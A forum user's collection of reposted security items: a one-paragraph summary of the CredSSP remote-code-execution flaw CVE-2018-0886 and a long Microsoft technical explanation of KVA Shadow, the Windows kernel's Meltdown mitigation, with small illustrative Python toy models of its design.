Everything posted by Nytro

  1. https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/
  2. From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886] In the March 2018 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability discovered by Preempt. It can be classified as a logical remote code execution (RCE) vulnerability. The vulnerability consists of a design flaw in CredSSP, the Security Support Provider used by Microsoft Remote Desktop and Windows Remote Management (including PowerShell sessions). An attacker with complete man-in-the-middle (MITM) control over such a session can abuse it to run arbitrary code on the target server on behalf of the user. This vulnerability affects all Windows versions. The white paper covers how Preempt researchers found the vulnerability, how they were able to exploit authentication in MS-RDP, and what you need to do to protect your organization. Source: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
  3. KVA Shadow: Mitigating Meltdown on Windows

swiat, March 23, 2018

On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post.

Vulnerability description & background

The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode.
Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architectural state of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out-of-order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory.

Operating system implications

Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode.
A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. 
This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. 
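The two address spaces described above can be pictured with a small toy model. This is only an illustrative sketch: the page names and helper functions are hypothetical and do not correspond to Windows internals. It shows that once the shadow user address space omits sensitive kernel pages, there is nothing privileged left mapped for a rogue data cache load to target while user mode code runs.

```python
# Toy model only: page names and helpers are hypothetical, not Windows internals.
USER_PAGES = {"app_code", "app_heap", "app_stack"}
SENSITIVE_KERNEL_PAGES = {"kernel_text", "kernel_pool", "thread_kernel_stack"}
# "Safe" kernel pages that must stay mapped so the CPU can enter/exit the kernel.
TRANSITION_PAGES = {"transition_code", "transition_stacks", "gdt_idt_tss"}


def kernel_address_space():
    """Address space used in kernel mode: maps all user and kernel pages."""
    return USER_PAGES | SENSITIVE_KERNEL_PAGES | TRANSITION_PAGES


def shadow_user_address_space():
    """Address space used in user mode: user pages plus transition pages only."""
    return USER_PAGES | TRANSITION_PAGES


def exposed_sensitive_pages(active_space):
    """Sensitive kernel pages that are mapped (and so speculatively
    readable on an affected processor) in the given address space."""
    return active_space & SENSITIVE_KERNEL_PAGES


if __name__ == "__main__":
    print("user mode exposure:", exposed_sensitive_pages(shadow_user_address_space()))
    print("kernel mode mapping:", sorted(exposed_sensitive_pages(kernel_address_space())))
```

The model deliberately treats a mapping as a set membership test; real page tables, permissions, and the transition code itself are far more involved.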
On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. 
This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. 
This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. 
When designing KVA shadow, several design considerations applied for trap handling when KVA shadow was active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist in (or be “shadowed into”) the user address space are those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS).
This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. 
However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow, which keep any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below).

Fielding a trap with KVA shadow active

Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur before the normal trap handling code in the kernel is invoked for kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur, in order:

  • The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor.
  • The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code. Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes.
  • The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread.
  • The current stack must be switched to the per-kernel-thread stack.

At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly differently, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs to be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptible code. This means that they could even interrupt the normally uninterruptible KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event.
These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. 
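The normal kernel entry and exit steps described above can be traced with a small simulation. This is a hedged sketch rather than the actual trap dispatch code: the `Cpu` class, its fields, and the function names are hypothetical, stacks are plain Python lists, and the machine frame "copy" is modeled as a move so that the toy transition stack ends up empty. IST-delivered traps and the SYSCALL path are not modeled.

```python
from dataclasses import dataclass, field


@dataclass
class Cpu:
    """Hypothetical per-processor state for a toy trace of KVA shadow entry/exit."""
    user_cr3: int
    kernel_cr3: int  # in the described design, kept in a shadowed per-processor page
    cr3: int = 0
    gs_base: str = "user"
    current_stack: str = "user"
    transition_stack: list = field(default_factory=list)
    thread_kernel_stack: list = field(default_factory=list)

    def __post_init__(self):
        # User mode code runs with the user (shadow) address space selected.
        self.cr3 = self.user_cr3


def hardware_trap_from_user(cpu, machine_frame):
    """Ring transition: hardware loads the stack from the TSS (here, the
    transition stack) and pushes the machine frame onto it."""
    cpu.current_stack = "transition"
    cpu.transition_stack.append(machine_frame)


def kva_shadow_kernel_entry(cpu):
    cpu.gs_base = "kernel"                      # 1. load the kernel GS base
    cpu.cr3 = cpu.kernel_cr3                    # 2. switch to the kernel address space
    frame = cpu.transition_stack.pop()          # 3. move the machine frame to the
    cpu.thread_kernel_stack.append(frame)       #    per-kernel-thread stack
    cpu.current_stack = "thread_kernel"         # 4. switch stacks


def kva_shadow_kernel_exit(cpu):
    frame = cpu.thread_kernel_stack.pop()       # inverse order of kernel entry
    cpu.transition_stack.append(frame)
    cpu.current_stack = "transition"
    cpu.cr3 = cpu.user_cr3
    cpu.gs_base = "user"


def interrupt_return(cpu):
    """Consume the machine frame and resume user mode (stands in for IRETQ)."""
    frame = cpu.transition_stack.pop()
    cpu.current_stack = "user"
    return frame


if __name__ == "__main__":
    cpu = Cpu(user_cr3=0x1000, kernel_cr3=0x2000)
    hardware_trap_from_user(cpu, {"rip": 0x401000, "rsp": 0x7FF000})
    kva_shadow_kernel_entry(cpu)
    print("in kernel:", hex(cpu.cr3), cpu.gs_base, cpu.current_stack)
    kva_shadow_kernel_exit(cpu)
    print("resumed frame:", interrupt_return(cpu), "cr3:", hex(cpu.cr3))
```

The point of the sketch is the ordering: nothing beyond the hardware-pushed machine frame ever sits on the transition stack, and the per-thread kernel stack is only touched after the kernel address space has been selected.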
Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. 
In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory pages if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel. For KVA shadow protections to be effective, processors susceptible to rogue data cache load must not be able to observe, while in user mode, any cached virtual address translations for privileged kernel pages that could contain sensitive memory contents, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch.

Booting is just the beginning of a journey

At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow.
However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. 
Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. 
Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost.

PCID acceleration

The first optimization, the usage of PCID (process-context identifier) acceleration, is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached in the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces.
This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). 
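The effect of PCID tagging on user/kernel transitions can be illustrated with a small toy model. This is only a sketch under stated assumptions: `ToyTLB`, `run_system_calls`, the page numbers, and the numeric values given to `PCID_KERNEL` and `PCID_USER` are all hypothetical, and the model ignores TB capacity, global pages, and flush IPIs. It only counts how many translations must be re-walked when every address space switch flushes the TB versus when entries are tagged and preserved.

```python
PCID_KERNEL = 1  # placeholder value; the real constants are not given in the text
PCID_USER = 2    # placeholder value


class ToyTLB:
    """Toy translation buffer whose entries are keyed by (pcid, virtual page)."""

    def __init__(self, tagged):
        self.tagged = tagged      # True models PCID support
        self.entries = {}         # (pcid, virtual page) -> physical page
        self.current_pcid = None
        self.misses = 0

    def switch_address_space(self, pcid):
        # Without tagging, every address space switch discards all entries.
        if not self.tagged:
            self.entries.clear()
        self.current_pcid = pcid

    def lookup(self, vpage, page_table):
        # A cached entry only matches if it carries the current PCID.
        key = (self.current_pcid, vpage)
        if key not in self.entries:
            self.misses += 1                      # models a page table walk
            self.entries[key] = page_table[vpage]
        return self.entries[key]


def run_system_calls(tlb, calls):
    """Touch 4 user pages, enter the kernel, touch 4 kernel pages, return."""
    user_pages = [0x10, 0x11, 0x12, 0x13]
    kernel_pages = [0x800, 0x801, 0x802, 0x803]
    user_table = {v: v + 0x1000 for v in user_pages}
    kernel_table = {v: v + 0x1000 for v in user_pages + kernel_pages}
    tlb.switch_address_space(PCID_USER)
    for _ in range(calls):
        for v in user_pages:
            tlb.lookup(v, user_table)
        tlb.switch_address_space(PCID_KERNEL)     # user -> kernel transition
        for v in kernel_pages:
            tlb.lookup(v, kernel_table)
        tlb.switch_address_space(PCID_USER)       # kernel -> user transition
    return tlb.misses


untagged_misses = run_system_calls(ToyTLB(tagged=False), calls=100)
tagged_misses = run_system_calls(ToyTLB(tagged=True), calls=100)
print(untagged_misses, tagged_misses)
```

In this model, 100 simulated system calls cost 800 misses when the TB is flushed on each transition and 8 misses when entries are tagged, which is the qualitative behavior the PCID optimization is after. Real savings depend on the workload and on TB capacity, which the sketch does not model.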
User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. 
Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. 
KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. 
